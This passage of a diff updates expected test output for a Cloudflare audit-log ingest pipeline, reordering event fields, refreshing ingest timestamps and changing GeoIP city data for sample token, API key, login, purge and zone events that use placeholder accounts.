"{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"73fd39ed-5aab-4a2a-b93c-c9a4abf0c425\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"b7261c49a793a82678d12285f0bc1401\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:48Z\"}", + "kind": "event", + "action": "token_create", + "id": "73fd39ed-5aab-4a2a-b93c-c9a4abf0c425", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -56,20 +70,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776103990Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"73fd39ed-5aab-4a2a-b93c-c9a4abf0c425\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"b7261c49a793a82678d12285f0bc1401\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:48Z\"}", - "kind": "event", - "action": "token_create", - "id": "73fd39ed-5aab-4a2a-b93c-c9a4abf0c425", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -97,14 +97,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -116,6 +116,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389079363Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9929d149-1c4e-4524-87b5-bb81e83b5c84\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:27Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "9929d149-1c4e-4524-87b5-bb81e83b5c84", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -136,20 +150,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776109944Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9929d149-1c4e-4524-87b5-bb81e83b5c84\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:27Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "9929d149-1c4e-4524-87b5-bb81e83b5c84", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -177,14 +177,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -196,6 +196,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389079840Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"de577d32-d81a-4fe9-95bc-3cff46d9759e\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T20:18:43Z\"}", + "kind": "event", + "action": "api_key_view", + "id": "de577d32-d81a-4fe9-95bc-3cff46d9759e", + "type": [ + "info" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -210,20 +224,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776112844Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"de577d32-d81a-4fe9-95bc-3cff46d9759e\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T20:18:43Z\"}", - "kind": "event", - "action": "api_key_view", - "id": "de577d32-d81a-4fe9-95bc-3cff46d9759e", - "type": [ - "info" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -251,14 +251,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -270,6 +270,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389080230Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"dc0b470f-17b0-4bff-9113-a4fba3bf052c\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T13:42:17Z\"}", + "kind": "event", + "action": "api_key_view", + "id": "dc0b470f-17b0-4bff-9113-a4fba3bf052c", + "type": [ + "info" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -284,20 +298,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776115518Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"dc0b470f-17b0-4bff-9113-a4fba3bf052c\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T13:42:17Z\"}", - "kind": "event", - "action": "api_key_view", - "id": "dc0b470f-17b0-4bff-9113-a4fba3bf052c", - "type": [ - "info" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -325,14 +325,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -344,6 +344,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389080624Z", + "original": "{\"action\":{\"info\":\"key digest: c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"result\":true,\"type\":\"rotate_API_key\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"8d3396e8-c903-5a66-9421-00fc34570550\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:42:04Z\"}", + "kind": "event", + "action": "rotate_api_key", + "id": "8d3396e8-c903-5a66-9421-00fc34570550", + "type": [ + "change" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -358,20 +372,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776118282Z", - "original": "{\"action\":{\"info\":\"key digest: c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"result\":true,\"type\":\"rotate_API_key\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"8d3396e8-c903-5a66-9421-00fc34570550\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:42:04Z\"}", - "kind": "event", - "action": "rotate_api_key", - "id": "8d3396e8-c903-5a66-9421-00fc34570550", - "type": [ - "change" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -399,14 +399,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -418,6 +418,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081008Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_created\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9320d713-8466-595e-a9f6-73891f89e8a3\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"type\":\"api_key\"},\"when\":\"2021-11-30T13:42:04Z\"}", + "kind": "event", + "action": "api_key_created", + "id": "9320d713-8466-595e-a9f6-73891f89e8a3", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -432,20 +446,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776120928Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_created\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9320d713-8466-595e-a9f6-73891f89e8a3\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"type\":\"api_key\"},\"when\":\"2021-11-30T13:42:04Z\"}", - "kind": "event", - "action": "api_key_created", - "id": "9320d713-8466-595e-a9f6-73891f89e8a3", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -473,14 +473,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -492,6 +492,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081383Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ceced925-a34c-4a3e-a3ae-5f35c00cf6c8\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:36:45Z\"}", + "kind": "event", + "action": "token_create", + "id": "ceced925-a34c-4a3e-a3ae-5f35c00cf6c8", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -510,20 +524,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776123539Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ceced925-a34c-4a3e-a3ae-5f35c00cf6c8\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:36:45Z\"}", - "kind": "event", - "action": "token_create", - "id": "ceced925-a34c-4a3e-a3ae-5f35c00cf6c8", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -551,14 +551,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -570,6 +570,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081755Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1034b2fe-abcc-523e-ab47-3d3ea14516fa\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:34:03Z\"}", + "kind": "event", + "action": "login", + "id": "1034b2fe-abcc-523e-ab47-3d3ea14516fa", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -584,20 +598,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776126170Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1034b2fe-abcc-523e-ab47-3d3ea14516fa\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:34:03Z\"}", - "kind": "event", - "action": "login", - "id": "1034b2fe-abcc-523e-ab47-3d3ea14516fa", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -625,14 +625,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -644,6 +644,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389082145Z", + "original": "{\"action\":{\"result\":true,\"type\":\"purge\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fedadd2-dda6-5357-9b08-c231baf1a172\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-17T10:13:46Z\"}", + "kind": "event", + "action": "purge", + "id": "2fedadd2-dda6-5357-9b08-c231baf1a172", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -661,20 +675,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776128849Z", - "original": "{\"action\":{\"result\":true,\"type\":\"purge\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fedadd2-dda6-5357-9b08-c231baf1a172\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-17T10:13:46Z\"}", - "kind": "event", - "action": "purge", - "id": "2fedadd2-dda6-5357-9b08-c231baf1a172", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -697,7 +697,7 @@ ] }, "event": { - "ingested": "2021-12-13T14:40:20.776131494Z", + "ingested": "2021-12-14T14:41:11.389082510Z", "original": "{\"action\":{\"result\":true,\"type\":\"tls_settings_deployed\"},\"actor\":{\"id\":\"1\",\"type\":\"system\"},\"id\":\"2ce6e0db-5527-4870-8f66-8ede1cd38791\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"ciphers\":\"\",\"early_hints\":\"Default\",\"http_2\":\"Enabled\",\"min_tls_version\":\"TLSv1.0\",\"quic\":\"Default\",\"session_tickets\":\"Enabled\",\"tls_13\":\"Default\",\"zero_rtt\":\"Default\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:46.214209Z\"}", "kind": "event", "action": "tls_settings_deployed", @@ -762,14 +762,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -781,6 +781,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389082896Z", + "original": "{\"action\":{\"result\":true,\"type\":\"delete\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"79ffe165-ebc7-502e-bf57-2bdba27ab100\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:44Z\"}", + "kind": "event", + "action": "delete", + "id": "79ffe165-ebc7-502e-bf57-2bdba27ab100", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -798,20 +812,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776134148Z", - "original": "{\"action\":{\"result\":true,\"type\":\"delete\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"79ffe165-ebc7-502e-bf57-2bdba27ab100\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:44Z\"}", - "kind": "event", - "action": "delete", - "id": "79ffe165-ebc7-502e-bf57-2bdba27ab100", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -839,14 +839,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -858,6 +858,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389083449Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"085982b3-dd56-43cd-97f9-68bfd672eacd\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:04Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "085982b3-dd56-43cd-97f9-68bfd672eacd", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -878,20 +892,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776136950Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"085982b3-dd56-43cd-97f9-68bfd672eacd\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:04Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "085982b3-dd56-43cd-97f9-68bfd672eacd", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -919,14 +919,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -938,6 +938,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389083829Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1d6bb655-9645-495b-bebe-f4537c2f7eaa\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:01Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "1d6bb655-9645-495b-bebe-f4537c2f7eaa", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -958,20 +972,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776139631Z", - "original": 